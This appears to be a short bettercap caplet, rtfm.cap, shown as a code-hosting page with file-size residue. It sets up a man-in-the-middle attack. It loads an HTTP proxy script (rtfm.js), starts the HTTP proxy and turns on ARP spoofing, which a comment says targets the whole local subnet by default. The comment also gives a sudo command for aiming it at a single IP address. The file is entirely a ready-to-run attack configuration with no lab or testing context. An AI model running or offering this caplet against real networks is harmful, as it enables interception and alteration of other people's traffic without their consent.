9 lines
210 B
Plaintext
9 lines
210 B
Plaintext
# targeting the whole subnet by default, to make it selective:
|
|
#
|
|
# sudo ./bettercap -caplet rtfm.cap -eval "set arp.spoof.targets 192.168.1.64"
|
|
|
|
clear
|
|
set http.proxy.script rtfm.js
|
|
http.proxy on
|
|
arp.spoof on
|